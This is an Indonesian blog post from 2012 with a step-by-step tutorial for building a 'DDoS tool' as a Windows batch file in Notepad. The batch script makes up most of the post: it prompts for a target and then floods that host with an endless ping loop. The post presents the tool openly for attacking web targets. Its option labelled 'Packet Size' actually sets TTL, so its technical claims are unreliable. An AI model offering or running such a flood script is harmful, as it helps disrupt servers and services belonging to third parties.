- Back to Home »
- Membuat Tool DDOS Sederhana Dari Notepad
Posted by : Unknown
Minggu, 30 Desember 2012
Dan kali ini saya akan memberikan sebuah tutorial, yaitu cara membuat
tools DDoS sederhana dari notepad. Jika kalian penasaran, mari kita
simak berikut ini.
1. Buka Notepad
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
3. Kemudian Save As...
4. Beri nama Tools DDoS.bat - Ubah Save As type: All Files - Save.
5. Buka file yang sudah dibuat tadi,
6. Jika berhasil tampilannya akan seperti ini :
7. Masukan web target pada kolom yang berkedip
8. Kemudian tekan Enter.
Sumber : cyrebon-cyber4rt





